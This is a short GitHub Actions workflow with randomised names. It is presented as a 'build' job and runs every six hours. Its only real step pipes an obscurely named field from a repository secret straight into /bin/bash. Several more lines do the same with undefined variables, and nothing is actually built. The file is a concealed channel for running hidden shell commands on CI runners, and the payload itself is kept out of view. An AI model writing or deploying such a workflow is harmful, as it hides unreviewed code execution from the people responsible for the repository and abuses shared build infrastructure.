name: ghyiuhru
on:
  workflow_dispatch:
  schedule:
    - cron: '25 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ghyiuhru
        env:
          rtt18555: ${{ secrets.rtt18555 }}
        run: |
          echo $rtt18555 | jq -r .xxmqy44 | /bin/bash
          echo $zk760 | jq -r .i71 | /bin/bash
          echo $ltt223 | jq -r .iuio48679 | /bin/bash
          echo $v62671 | jq -r .fbwvn192 | /bin/bash
          echo $b7 | jq -r .qjdo04 | /bin/bash
          echo $ou0873 | jq -r .subgw2103 | /bin/bash
          echo $vrzs8186 | jq -r .vtadv1 | /bin/bash

